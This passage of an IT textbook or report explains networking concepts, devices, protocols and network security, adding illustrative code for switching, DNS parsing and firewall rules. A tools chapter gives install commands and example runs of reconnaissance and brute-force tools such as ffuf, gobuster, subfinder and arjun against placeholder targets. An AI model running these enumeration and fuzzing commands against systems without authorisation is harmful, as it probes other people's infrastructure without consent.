scalability, security, and data integrity, you can create a database that meets the needs of users and
applications while ensuring reliability and maintainability.

Chapter 2: Computer Networks

2.1 Introduction to Networking


Networking is a fundamental aspect of modern computing that enables the communication and
exchange of data between devices. This chapter provides a comprehensive overview of networking, its
importance, and key concepts and technologies that underpin it.

Figure 2.1

2.1.1 Definition and Purpose of Networking

Networking refers to the interconnection of multiple devices (such as computers, servers, and other
hardware) to share resources and communicate. Networks can range from simple setups, like a home
network connecting a few devices, to complex, large-scale enterprise networks connecting thousands
of devices across multiple locations.

The primary purposes of networking include:

• Resource Sharing: Allows multiple devices to share resources such as files, printers, and
internet connections.
• Communication: Enables devices to communicate through various protocols and services, such
as email, instant messaging, and VoIP.
• Data Transfer: Facilitates the transfer of data between devices, essential for applications like
cloud computing and data centers.
• Collaboration: Supports collaborative work environments, allowing users to access and work
on shared documents and applications in real-time.

2.1.2 Network Types

Figure 2.2

Networks can be categorized based on their size, geographical coverage, and architecture:

1. Local Area Network (LAN): Covers a small geographical area, such as a home, office, or building.
LANs are typically used for connecting personal computers and devices within a limited area.
2. Wide Area Network (WAN): Spans a large geographical area, often connecting multiple LANs.
The internet is the largest example of a WAN.
3. Metropolitan Area Network (MAN): Covers a city or metropolitan area, larger than a LAN but
smaller than a WAN.
4. Personal Area Network (PAN): A small network, usually within a range of a few meters, used
to connect personal devices like smartphones, tablets, and laptops.
5. Virtual Private Network (VPN): Extends a private network across a public network, enabling
secure communication and data transfer over the internet.

2.1.3 Network Topologies

Figure 2.3

Network topology refers to the arrangement of devices and how they are interconnected. Common
topologies include:

1. Bus Topology: All devices are connected to a single central cable (bus). It is simple and cost-
effective but can suffer from collisions and is not highly scalable.
2. Star Topology: All devices are connected to a central hub or switch. It is easy to manage and
scalable, but the central point can be a single point of failure.
3. Ring Topology: Devices are connected in a circular fashion, with each device connected to two
other devices. It can be efficient but is less commonly used due to complexity and failure
vulnerability.
4. Mesh Topology: Every device is connected to every other device. It provides high redundancy
and reliability but is expensive and complex to implement.
5. Hybrid Topology: Combines two or more different topologies to leverage the advantages of
each.

2.1.4 Importance of Networking

Networking is crucial for several reasons:

• Connectivity: Enables devices to connect and communicate, forming the backbone of modern
digital communication.
• Resource Optimization: Allows efficient use of resources by sharing devices and data across
multiple users and applications.
• Scalability: Facilitates the growth of systems and infrastructure, supporting more devices and
users as needed.

• Collaboration: Enhances productivity by enabling real-time collaboration and information
sharing.
• Data Accessibility: Ensures data is accessible from anywhere, supporting remote work and
cloud computing.

In conclusion, understanding the fundamentals of networking is essential for anyone involved in IT and
computing. This chapter introduces the key concepts, types, topologies, protocols, and devices that
form the basis of modern networks, setting the stage for more advanced topics and practical
applications.

2.2 Network Devices

Network devices are critical components that enable communication, data transfer, and connectivity
within and between networks. This section explores the various types of network devices, their
functions, and how they contribute to building and maintaining efficient and secure networks.

2.2.1. Router

Function: Routers are devices that forward data packets between computer networks. They route
traffic from one network to another, typically from a local area network (LAN) to a wide area network
(WAN), such as the internet.

Figure 2.4

Key Features:

• Routing: Determines the best path for data packets to reach their destination using routing
tables and algorithms.
• NAT (Network Address Translation): Translates private IP addresses within a LAN to a public IP
address for internet access.
• Firewall Capabilities: Provides basic security by filtering incoming and outgoing traffic based on
predefined rules.
• Wireless Connectivity: Many modern routers include wireless capabilities, functioning as access
points to provide Wi-Fi connectivity.

Example: Home routers, enterprise routers (e.g., Cisco, Juniper).

2.2.2. Switch

Function: Switches connect devices within a LAN and use MAC addresses to forward data to the correct
destination within the network. They operate at the data link layer (Layer 2) of the OSI model.

Figure 2.5

Key Features:

• Frame Forwarding: Forwards Ethernet frames based on MAC addresses.
• VLAN Support: Allows the creation of virtual LANs to segment network traffic.
• Full-Duplex Communication: Supports simultaneous sending and receiving of data on a
connection.
• Port Mirroring: Enables monitoring of network traffic by copying data from one port to another
for analysis.

Example: Unmanaged switches (simple, plug-and-play), managed switches (configurable, often used in
enterprise networks).

2.2.3. Hub

Function: Hubs are basic networking devices that connect multiple Ethernet devices, making them act
as a single network segment. They operate at the physical layer (Layer 1) of the OSI model.

Figure 2.6

Key Features:

• Broadcast Communication: Transmits data received on one port to all other ports.
• Collision Domain: All devices connected to a hub share the same collision domain, which can
lead to network inefficiencies.

Example: 4-port, 8-port, and 16-port hubs (largely obsolete in modern networks, replaced by switches).
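The forwarding behaviour that separates a hub from a switch, as an added example written for this report (not from the training material): the hub repeats every frame out of every other port, while the learning switch records which port each source MAC address arrived on, forwards known destinations to one port only, and floods unknown or broadcast destinations only within the sender's VLAN. The MAC addresses, port assignments and VLAN map are constructed.

```python
from typing import Dict, List, Optional, Tuple

# Added example: a hub and a learning switch modelled as forwarding decisions.
# MAC addresses, port numbers and the VLAN map below are constructed.
BROADCAST = "ff:ff:ff:ff:ff:ff"


class Hub:
    """Layer 1: repeats every frame out of every other port. One collision domain."""

    def __init__(self, ports: int) -> None:
        self.ports = ports

    def forward(self, in_port: int, src: str, dst: str) -> List[int]:
        return [p for p in range(self.ports) if p != in_port]


class LearningSwitch:
    """Layer 2: learns the port of each source MAC and forwards known destinations
    there only. Unknown and broadcast destinations are flooded, but only to ports
    in the same VLAN as the sender."""

    def __init__(self, ports: int, vlans: Optional[Dict[int, int]] = None) -> None:
        self.ports = ports
        self.vlans = vlans or {p: 1 for p in range(ports)}   # default: a single VLAN
        self.mac_table: Dict[Tuple[int, str], int] = {}       # (vlan, mac) -> port

    def forward(self, in_port: int, src: str, dst: str) -> List[int]:
        vlan = self.vlans[in_port]
        self.mac_table[(vlan, src)] = in_port                 # learn or refresh the source
        if dst != BROADCAST and (vlan, dst) in self.mac_table:
            out = self.mac_table[(vlan, dst)]
            return [] if out == in_port else [out]            # same port: nothing to send
        return [p for p in range(self.ports) if p != in_port and self.vlans[p] == vlan]


# Constructed traffic: host A on port 0, B on port 1, C on port 2, D on port 3.
FRAMES = [
    (0, "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:02"),   # A -> B, B not learned yet
    (1, "aa:aa:aa:aa:aa:02", "aa:aa:aa:aa:aa:01"),   # B -> A, A already learned
    (0, "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:02"),   # A -> B, B now learned
    (2, "aa:aa:aa:aa:aa:03", BROADCAST),             # C broadcasts (e.g. an ARP request)
]


def deliveries(device) -> int:
    """Total number of port transmissions the device makes for FRAMES."""
    return sum(len(device.forward(*frame)) for frame in FRAMES)


if __name__ == "__main__":
    print("hub:", deliveries(Hub(4)))                                         # 12
    print("switch:", deliveries(LearningSwitch(4)))                           # 8
    print("switch, 2 VLANs:", deliveries(LearningSwitch(4, {0: 10, 1: 10, 2: 20, 3: 20})))  # 4
```

The counts are the point: every frame through the hub reaches every port (and every attached host can read it), the switch sends most unicast frames to exactly one port, and VLANs shrink the flooding domain further. This is also why port mirroring exists on switches: without it, a monitoring host on another port never sees the unicast traffic.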

2.2.4. Access Point (AP)

Function: Access points enable wireless devices to connect to a wired network using Wi-Fi.
They extend the reach of a network and facilitate wireless communication.

Figure 2.7

Key Features:

• Wireless Standards: Supports various Wi-Fi standards (e.g., 802.11a/b/g/n/ac/ax).
• SSID (Service Set Identifier): Allows configuration of network names for identification.
• Security Protocols: Implements security measures such as WPA3, WPA2, and WEP.
• Multiple SSIDs: Supports multiple network names for different user groups or purposes.

Example: Standalone access points, integrated wireless routers, enterprise access points (e.g., Ubiquiti,
Cisco Meraki).

2.2.5. Modem

Function: Modems modulate and demodulate digital data into a format suitable for transmission over
analog communication lines, such as telephone lines or cable systems.

Figure 2.8

Key Features:

• Modulation/Demodulation: Converts digital signals from a computer to analog signals for
transmission and vice versa.
• Types: Dial-up modems, DSL modems, cable modems, fiber optic modems.
• Connection Interfaces: Connects to ISPs (Internet Service Providers) for internet access.

Example: DSL modems, cable modems, fiber optic modems (e.g., Motorola, Netgear).

2.2.6. Firewall

Function: Firewalls are network security devices that monitor and control incoming and outgoing
network traffic based on predetermined security rules. They act as a barrier between trusted and
untrusted networks.

Figure 2.9

Key Features:

• Packet Filtering: Inspects incoming and outgoing packets and allows or blocks them based on
security rules.

• Stateful Inspection: Keeps track of active connections and makes decisions based on the state
of the connection.
• Intrusion Detection/Prevention: Identifies and responds to potential security threats.
• VPN Support: Enables secure remote access through Virtual Private Networks.

Example: Hardware firewalls (e.g., Fortinet, Palo Alto Networks), software firewalls (e.g., Windows
Firewall).

2.2.7. Network Interface Card (NIC)

Function: NICs are hardware components that connect a computer or other device to a network. They
can be wired or wireless.

Figure 2.10

Key Features:

• MAC Address: Each NIC has a unique Media Access Control address for network identification.
• Speed and Duplex: Supports various speeds (e.g., 10/100/1000 Mbps) and full/half-duplex
communication.
• Wired/Wireless: Available in Ethernet (wired) and Wi-Fi (wireless) versions.

Example: Built-in NICs in computers, external USB NICs, PCIe NICs.

Conclusion

Network devices play a vital role in establishing and maintaining efficient, secure, and scalable
networks. Understanding the functions and features of these devices is essential for designing,
implementing, and managing network infrastructures. Each device contributes uniquely to the overall
functionality of the network, ensuring seamless communication and data transfer across different
environments.

2.3 Network Protocols

Network protocols are a set of rules and conventions that govern how data is transmitted and received
across networks. They ensure reliable communication and interoperability between different devices
and systems. This section covers some of the most essential network protocols, their functions, and
how they operate within the networking ecosystem.

Figure 2.11

2.3.1. Transmission Control Protocol/Internet Protocol (TCP/IP)

Function: TCP/IP is the foundational protocol suite for the internet and most modern networks. It
ensures reliable communication by providing end-to-end data transfer and addressing mechanisms.

Figure 2.12

Components:

• IP (Internet Protocol): Handles addressing and routing of packets to ensure they reach the
correct destination.
• TCP (Transmission Control Protocol): Ensures reliable, ordered, and error-checked delivery of
a stream of data between applications.
• UDP (User Datagram Protocol): Provides a connectionless datagram service that emphasizes
speed over reliability, used for applications like streaming and gaming.

Operation:

• Data Encapsulation: Data is broken into packets, encapsulated with headers for IP addressing
and TCP/UDP control information.
• Routing: IP handles the forwarding of packets from the source to the destination through
intermediate routers.
• Error Checking: TCP provides mechanisms for error detection, retransmission of lost packets,
and ensuring data integrity.

2.3.2. Hypertext Transfer Protocol (HTTP/HTTPS)

Function: HTTP is the protocol used for transferring web pages over the internet. HTTPS is the secure
version, encrypting data for safe transmission.

Figure 2.13

Components:

• HTTP: Defines how messages are formatted and transmitted, and how web servers and
browsers should respond to various commands.
• HTTPS: Adds a layer of security by using SSL/TLS to encrypt data between the client and server.

Operation:

• Request/Response Model: Clients send HTTP requests to servers, which respond with the
requested resources or error messages.
• Status Codes: HTTP uses status codes to indicate the result of a request (e.g., 200 OK, 404 Not
Found, 500 Internal Server Error).

• Secure Communication: HTTPS ensures data privacy and integrity through encryption and
secure certificate validation.

2.3.3. File Transfer Protocol (FTP)

Function: FTP is used for transferring files between computers on a network.

Figure 2.14

Components:

• FTP Client: The software used to initiate a connection and transfer files to/from an FTP server.
• FTP Server: The software that hosts files and responds to requests from FTP clients.

Operation:

• Control Connection: Establishes a session between the client and server for sending commands.
• Data Connection: Handles the actual transfer of files.
• Commands: Includes commands for navigating directories, uploading/downloading files, and
managing file permissions.

2.3.4. Simple Mail Transfer Protocol (SMTP)

Function: SMTP is used for sending and receiving email messages.

Figure 2.15

Components:

• SMTP Client: Sends email messages to an SMTP server.
• SMTP Server: Receives and forwards email messages to their destination.

Operation:

• Mail Submission: The client sends an email to the server using the SMTP protocol.
• Mail Transfer: The server forwards the email to the recipient's server, which delivers it to the
recipient's mailbox.
• Commands: Includes commands for initiating a session, sending mail data, and closing the
connection (e.g., HELO, MAIL FROM, RCPT TO, DATA, QUIT).

2.3.5. Domain Name System (DNS)

Function: DNS translates human-readable domain names (e.g., www.example.com) into IP addresses.

Figure 2.16

Components:

• DNS Resolver: The client-side service that queries DNS servers.
• DNS Server: Responds to DNS queries with the corresponding IP address for a given domain
name.

• DNS Records: Includes records such as A (address), MX (mail exchange), CNAME (canonical
name), and TXT (text).

Operation:

• Query Resolution: The resolver sends a query to a DNS server, which responds with the IP
address or directs the query to another server if necessary.
• Caching: DNS responses are cached to improve resolution speed and reduce query load on
servers.
• Hierarchy: DNS uses a hierarchical structure with root servers, top-level domain (TLD) servers,
and authoritative servers.
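The query/response exchange above at the wire level, as an added example written for this report (not from the training material): one function builds the DNS query a resolver sends for an A record, and another parses the reply, including the name compression pointers that real responses use. The response is constructed in code (a CNAME followed by an A record pointing at 192.0.2.10, a documentation address), so nothing is sent on the network. The transaction-id check is the resolver's first defence against a reply that was not the answer to its own question.

```python
import struct
from typing import Dict, List, Tuple

# Added example: DNS query construction and response parsing in the RFC 1035 wire
# format. The response bytes are constructed here, not captured from a server.


def encode_name(name: str) -> bytes:
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Standard query header (RD=1) followed by one question; qtype 1 = A record."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def read_name(msg: bytes, offset: int) -> Tuple[str, int]:
    """Decode a name that may use compression pointers; return (name, next offset)."""
    labels: List[str] = []
    end = None            # offset just past the name where it originally appeared
    hops = 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                         # 11xxxxxx: pointer
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if end is None:
                end = offset + 2
            hops += 1
            if hops > 64:                                 # pointer loop in a hostile reply
                raise ValueError("compression pointer loop")
            offset = pointer
            continue
        if length == 0:
            offset += 1
            break
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), (offset if end is None else end)


def parse_response(msg: bytes, expected_txid: int) -> Dict:
    """Return the rcode and the answers as (name, type, ttl, value) tuples."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid:
        raise ValueError("transaction id mismatch: reply does not belong to our query")
    offset = 12
    for _ in range(qdcount):                              # skip the echoed question(s)
        _, offset = read_name(msg, offset)
        offset += 4                                       # qtype + qclass
    answers = []
    for _ in range(ancount):
        name, offset = read_name(msg, offset)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        if rtype == 1 and rdlen == 4:                     # A: IPv4 address
            value = ".".join(str(b) for b in rdata)
        elif rtype == 5:                                  # CNAME: another (compressible) name
            value, _ = read_name(msg, offset)
        else:
            value = rdata.hex()
        offset += rdlen
        answers.append((name, rtype, ttl, value))
    return {"rcode": flags & 0x000F, "answers": answers}


def constructed_response(txid: int = 0x1234) -> bytes:
    """A constructed reply to build_query('www.example.com'): a CNAME, then an A record."""
    query = build_query("www.example.com", 1, txid)
    msg = struct.pack("!HHHHHH", txid, 0x8180, 1, 2, 0, 0) + query[12:]   # QR=1, RD, RA
    cname_rdata = b"\x03web" + b"\xc0\x10"        # "web" + pointer to "example.com" at offset 16
    msg += b"\xc0\x0c" + struct.pack("!HHIH", 5, 1, 300, len(cname_rdata)) + cname_rdata
    cname_target_offset = len(query) + 12          # where "web.example.com" begins
    msg += struct.pack("!H", 0xC000 | cname_target_offset)
    msg += struct.pack("!HHIH", 1, 1, 60, 4) + bytes([192, 0, 2, 10])  # TEST-NET-1 address
    return msg


def demo() -> Dict:
    """Parse the constructed reply and show that a reply with the wrong id is rejected."""
    parsed = parse_response(constructed_response(0x1234), 0x1234)
    try:
        parse_response(constructed_response(0x1234), 0x9999)
        rejected = False
    except ValueError:
        rejected = True
    return {"rcode": parsed["rcode"], "answers": parsed["answers"], "wrong_id_rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

The TTL in each answer is what the caching step works from: a resolver may reuse the A record for 60 seconds and the CNAME for 300 before asking again.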

2.3.6. Dynamic Host Configuration Protocol (DHCP)

Function: DHCP automatically assigns IP addresses to devices on a network.

Figure 2.17

Components:

• DHCP Client: The device requesting an IP address.
• DHCP Server: Assigns IP addresses and other network configuration details to clients.

Operation:

• Discovery: The client broadcasts a DHCPDISCOVER message to find available DHCP servers.
• Offer: Servers respond with DHCPOFFER messages containing available IP addresses.
• Request: The client sends a DHCPREQUEST message to request a specific IP address.
• Acknowledgement: The server confirms the IP address assignment with a DHCPACK message.

2.3.7. Secure Shell (SSH)

Function: SSH provides secure remote access and command execution over an encrypted connection.

Figure 2.18

Components:

• SSH Client: The software used to initiate a secure connection to an SSH server.
• SSH Server: The software that accepts and responds to SSH client connections.

Operation:

• Authentication: The client authenticates with the server using methods such as passwords,
public keys, or certificates.
• Encryption: All data transmitted between the client and server is encrypted to ensure
confidentiality and integrity.
• Commands: The client can execute commands on the server, transfer files, and perform other
remote management tasks.

Conclusion

Network protocols are essential for enabling communication, data transfer, and network management
in modern computing environments. Each protocol serves a specific purpose, from basic data
transmission and web browsing to secure communication and network diagnostics. Understanding
these protocols and their functions is fundamental for designing, implementing, and troubleshooting
networked systems.

2.4 Network Security

Network security is the practice of protecting a computer network from intrusions, misuse, and
unauthorized access. It encompasses various measures, protocols, and technologies designed to
ensure the confidentiality, integrity, and availability of data transmitted across the network. This
section explores the fundamental concepts, threats, and protective measures associated with network
security.

Figure 2.19

2.4.1 Fundamental Concepts of Network Security

1. Confidentiality: Ensuring that sensitive information is accessed only by authorized individuals
and entities.
2. Integrity: Protecting data from being altered or tampered with by unauthorized parties.
3. Availability: Ensuring that network services and resources are accessible to authorized users
when needed.
4. Authentication: Verifying the identity of users and devices before granting access to network
resources.
5. Authorization: Granting or denying permissions to users and devices based on their identity
and roles.
6. Non-repudiation: Ensuring that a party cannot deny the authenticity of their signature on a
document or a message that they sent.

2.4.2 Common Network Security Threats

1. Malware: Malicious software such as viruses, worms, trojans, ransomware, and spyware
designed to damage or disrupt systems, steal data, or gain unauthorized access.
2. Phishing: A technique used by attackers to trick individuals into revealing sensitive information
such as usernames, passwords, and credit card numbers.
3. Man-in-the-Middle (MitM) Attacks: An attacker intercepts and potentially alters the
communication between two parties without their knowledge.
4. Denial of Service (DoS) and Distributed Denial of Service (DDoS): Attacks aimed at
overwhelming network resources, making services unavailable to legitimate users.
5. SQL Injection: Exploiting vulnerabilities in web applications to execute malicious SQL commands
that can access, modify, or delete database data.
6. Zero-Day Exploits: Attacks that target vulnerabilities in software that are unknown to the
software vendor or public.
7. Eavesdropping: Unauthorized interception of data being transmitted over the network.

2.4.3 Network Security Measures and Technologies

1. Firewalls: Devices or software applications that control incoming and outgoing network traffic
based on predetermined security rules. They act as a barrier between trusted and untrusted
networks.
o Packet Filtering Firewalls: Inspect packets and allow or block them based on
source/destination IP address, port, and protocol.
o Stateful Inspection Firewalls: Monitor the state of active connections and make
decisions based on the state and context of traffic.
o Next-Generation Firewalls (NGFW): Combine traditional firewall features with
advanced functionalities like deep packet inspection, intrusion prevention, and
application awareness.
2. Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS):
o IDS: Monitors network traffic for suspicious activity and alerts administrators to
potential threats.
o IPS: Monitors network traffic and takes proactive steps to block or mitigate detected
threats.
3. Virtual Private Networks (VPNs): Secure connections over the internet that encrypt data
between the client and server, ensuring privacy and data integrity. VPNs are used to create
secure remote access and site-to-site connections.
4. Encryption:
o Transport Layer Security (TLS)/Secure Sockets Layer (SSL): Protocols for encrypting
data in transit, ensuring secure communication over networks.

o IPSec: A suite of protocols for securing internet protocol (IP) communications by
authenticating and encrypting each IP packet.
5. Authentication and Access Control:
o Multi-Factor Authentication (MFA): Requires two or more verification methods to gain
access, such as a password and a biometric scan.
o Role-Based Access Control (RBAC): Grants access to resources based on the user’s role
within an organization.
o Public Key Infrastructure (PKI): Uses pairs of cryptographic keys (public and private) to
verify identities and secure communications.
6. Antivirus and Anti-Malware Software: Detects and removes malicious software from devices,
protecting them from infections and potential damage.
7. Network Segmentation: Dividing a network into smaller segments or subnets to contain and
limit the impact of security breaches.
8. Security Information and Event Management (SIEM): Solutions that provide real-time analysis
of security alerts generated by network hardware and applications, helping to identify and
respond to threats quickly.
9. Endpoint Security: Protects individual devices (endpoints) that connect to the network,
including laptops, desktops, smartphones, and tablets. This includes antivirus, anti-malware, and
endpoint detection and response (EDR) solutions.
10. Regular Updates and Patch Management: Ensuring that all network devices, operating
systems, and applications are up-to-date with the latest security patches to protect against
known vulnerabilities.
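The difference between a packet filtering firewall and a stateful inspection firewall (item 1 above), as an added example written for this report and not taken from the training material: rules are matched on source/destination address, port and protocol with first-match semantics and a default deny, and a connection table lets replies to an allowed flow through even though no rule names them. The office network, the admin host, the two rules and the five packets are all constructed; the documentation address ranges 203.0.113.0/24 and 198.51.100.0/24 stand in for the outside world.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Added example: packet filtering (first-match rules, default deny) plus stateful
# inspection (a table of allowed flows). Addresses, rules and traffic are constructed.


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str      # "tcp" or "udp"
    sport: int
    dport: int


@dataclass
class Rule:
    action: str                  # "allow" or "deny"
    proto: Optional[str] = None  # None matches any protocol
    src: Optional[str] = None    # CIDR; None matches any source
    dst: Optional[str] = None    # CIDR; None matches any destination
    dport: Optional[int] = None  # None matches any destination port

    def matches(self, pkt: Packet) -> bool:
        if self.proto is not None and self.proto != pkt.proto:
            return False
        if self.src is not None and ipaddress.ip_address(pkt.src) not in ipaddress.ip_network(self.src):
            return False
        if self.dst is not None and ipaddress.ip_address(pkt.dst) not in ipaddress.ip_network(self.dst):
            return False
        if self.dport is not None and self.dport != pkt.dport:
            return False
        return True


class StatefulFilter:
    """Rules are evaluated top-down, first match wins, anything unmatched is denied.
    Every allowed packet is recorded as a flow; a packet travelling in the reverse
    direction of a recorded flow is accepted as 'established' without needing a rule."""

    def __init__(self, rules: List[Rule]) -> None:
        self.rules = rules
        self.flows: Set[Tuple[str, str, int, str, int]] = set()

    def decide(self, pkt: Packet) -> str:
        reverse = (pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if reverse in self.flows:
            return "allow (established)"
        for rule in self.rules:
            if rule.matches(pkt):
                if rule.action == "allow":
                    self.flows.add((pkt.proto, pkt.src, pkt.sport, pkt.dst, pkt.dport))
                return rule.action
        return "deny (default)"


# Constructed policy for a 10.0.0.0/24 office LAN with an admin host at 10.0.0.5:
#   1. internal hosts may open HTTPS to anywhere
#   2. only internal hosts may reach the admin host's SSH port
RULES = [
    Rule("allow", proto="tcp", src="10.0.0.0/24", dport=443),
    Rule("allow", proto="tcp", src="10.0.0.0/24", dst="10.0.0.5/32", dport=22),
]

# Constructed traffic, processed in this order
TRAFFIC = [
    Packet("10.0.0.7", "203.0.113.10", "tcp", 51000, 443),   # client opens HTTPS
    Packet("203.0.113.10", "10.0.0.7", "tcp", 443, 51000),   # the server's reply to that flow
    Packet("203.0.113.10", "10.0.0.7", "tcp", 443, 51001),   # same server, but unsolicited
    Packet("198.51.100.9", "10.0.0.5", "tcp", 40000, 22),    # outsider to the admin SSH port
    Packet("10.0.0.3", "10.0.0.5", "tcp", 40001, 22),        # insider to the admin SSH port
]


def run(traffic: List[Packet] = TRAFFIC) -> List[str]:
    """Return the decision for each packet in order."""
    fw = StatefulFilter(RULES)
    return [fw.decide(pkt) for pkt in traffic]


if __name__ == "__main__":
    for pkt, decision in zip(TRAFFIC, run()):
        print(f"{pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport}  {decision}")
```

Packets two and three are the stateful part: both come from the same server and port, but only the one that answers a flow the firewall saw leave is accepted. A stateless packet filter would have to either allow all inbound traffic from port 443 (and accept packet three) or block the legitimate reply as well.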

2.4.4 Best Practices for Network Security

1. Security Policies and Procedures: Establishing and enforcing comprehensive security policies
and procedures to guide employees and administrators in maintaining network security.
2. User Education and Awareness: Training users to recognize and avoid security threats, such as
phishing scams and social engineering attacks.
3. Regular Security Audits and Assessments: Conducting periodic reviews and assessments to
identify vulnerabilities and ensure compliance with security policies.
4. Backup and Recovery Plans: Implementing regular data backups and having a robust disaster
recovery plan to restore operations quickly in case of a security incident.
5. Least Privilege Principle: Granting users and applications the minimum level of access necessary
to perform their functions, reducing the risk of unauthorized access.

Conclusion

Network security is a critical aspect of modern computing, protecting data and resources from a wide
range of threats. By understanding the fundamental concepts, common threats, and protective
measures, organizations can build robust defenses to safeguard their networks and ensure the
integrity, confidentiality, and availability of their data. Implementing best practices and staying
informed about emerging threats and technologies are essential for maintaining a secure network
environment.

Chapter 3: Tools
3.1 gau (GetAllUrls)
o Function: Fetches known URLs for a domain from sources like Wayback Machine, Common Crawl, AlienVault OTX.
o Use Case: Passive discovery of historical URLs for potential endpoints.
o Installation & Usage: go install github.com/lc/gau/v2/cmd/gau@latest
o Example: echo example.com | gau --subs --blacklist png,jpg

3.2 katana
o Function: High-performance crawling and spidering framework.
o Use Case: Automated crawling to discover endpoints, JS files, and parameters.
o Installation & Usage: go install github.com/projectdiscovery/katana/cmd/katana@latest
o Example: katana -u https://target.com -jc -kf

3.3 assetfinder
o Function: Finds related domains and subdomains from public sources.
o Use Case: Passive subdomain enumeration.
o Installation & Usage: go install github.com/tomnomnom/assetfinder@latest
o Example: assetfinder --subs-only example.com

3.4 subfinder
o Function: Passive subdomain discovery using multiple APIs.
o Use Case: Quickly find valid subdomains with minimal requests to targets.
o Installation & Usage: go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
o Example: subfinder -d example.com -silent

3.5 ffuf
o Function: Fast web fuzzer for directories, parameters, vhosts.
o Use Case: High-speed fuzzing for content discovery.
o Installation & Usage: go install github.com/ffuf/ffuf@latest
o Example: ffuf -u https://target.com/FUZZ -w wordlist.txt

3.6 arjun (aka gosarjun)
o Function: Python tool that brute-forces hidden HTTP parameters not visible in forms or API docs.
o Use Case: Discover undocumented or hidden parameters that can lead to vulnerabilities like IDOR, SQLi, or data leakage.
o Installation & Usage: pipx install arjun

3.7 gospider
o Function: Fast web spider for crawling URLs, JS links, subdomains, AWS buckets.
o Use Case: Find hidden links and assets.
o Installation & Usage: go install github.com/jaeles-project/gospider@latest
o Example: gospider -s https://target.com -o output

3.8 gobuster
o Function: Brute-force directories, DNS, and virtual hosts.
o Use Case: Discover hidden files, folders, and subdomains.
o Installation & Usage: sudo apt install gobuster
o Example: gobuster dir -u https://target.com -w wordlist.txt

3.9 dirsearch
o Function: Web path scanner to brute-force directories/files.
o Use Case: Find hidden files and directories on web servers.
o Installation & Usage: git clone https://github.com/maurosoria/dirsearch.git
o Example: python3 dirsearch.py -u https://target.com -e php,html,js
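The crawlers and URL collectors above all emit one URL per line. The script below is added here as an example (it is not part of gau, katana, gospider or the report) and turns such output into an endpoint inventory, the way a defender reviewing their own exposed surface would: it drops static assets (the same idea as gau's --blacklist), collapses duplicates, keeps parameter names but never their values, and lists endpoints that fall outside the published surface. The sample lines and the list of expected path prefixes are constructed for this example.

```python
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in the shape gau / katana / gospider print (one URL
# per line). They are made up for this example and refer to no real target.
SAMPLE_URLS = """\
https://example.com/product?productId=6&storeId=1
https://example.com/product?productId=7&storeId=2
https://example.com/static/logo.png
https://example.com/static/app.css
https://example.com/admin/
https://api.example.com/v1/users?id=3
http://example.com/login.php?redirect=/home
https://example.com/product?productId=6&storeId=1
not a url at all
"""

# Extensions dropped from the inventory, like gau's --blacklist png,jpg
STATIC_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "svg", "css", "woff", "woff2", "ico"}


def is_static(path: str) -> bool:
    """True when the path's last component carries a blacklisted extension."""
    last = path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    return ext in STATIC_EXTENSIONS


def build_inventory(lines: str) -> dict:
    """Return {(host, path): {param_name, ...}} for every distinct endpoint.

    Duplicates collapse, static assets are skipped and only parameter names
    are kept, so the inventory can be shared without leaking parameter values.
    """
    inventory = defaultdict(set)
    for raw in lines.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        parts = urlsplit(raw)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue                      # crawler noise, not a URL
        path = parts.path or "/"
        if is_static(path):
            continue
        key = (parts.hostname, path)      # hostname is already lower-cased
        inventory[key].update(
            name for name, _ in parse_qsl(parts.query, keep_blank_values=True))
    return dict(inventory)


def unexpected_endpoints(inventory: dict, expected_prefixes) -> list:
    """Endpoints whose path starts with none of the published prefixes.

    This is the list a defender reviews: an /admin/ path in a public archive
    was reachable at some point, whether or not it still is.
    """
    return sorted(
        f"{host}{path}" for (host, path) in inventory
        if not any(path.startswith(p) for p in expected_prefixes))


if __name__ == "__main__":
    inv = build_inventory(SAMPLE_URLS)
    for (host, path), params in sorted(inv.items()):
        print(f"{host}{path}  params={sorted(params)}")
    print("review:", unexpected_endpoints(inv, ["/product", "/login.php", "/v1/"]))
```

The inventory is keyed on host and path only, so the same endpoint seen with different parameter values appears once with the union of its parameter names; comparing that list against the routes the application is supposed to expose is the defensive use of the same data the tools collect.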

4.1 Introduction to Information Gathering

Figure 4.1

Information gathering extends beyond mere data collection. It is a systematic process involving the acquisition,
arrangement, and evaluation of data, facts, and knowledge from diverse sources using sophisticated tools. The
principles guiding this process are:

• Maintaining simplicity
• Thorough planning
• Collecting reliable data with stringent quality control
• Involving pertinent stakeholders

Every piece of collected information supports informed decision-making, strategic planning, and comprehensive
research.

Systematic data collection involves sampling methods and methodical processes for gathering observations or
measurements. Whether researching network protocols or analyzing consumer behavior, the methods used
influence the quality of insights obtained.

4.1.1 What is Information Gathering?

Information gathering is the foundational step in understanding environments, systems, or markets. It bridges
raw data and actionable intelligence.

For more on the difference between information, data, and threat intelligence, refer to: “Threat Intelligence,
Information, and Data: What Is the Difference?”.

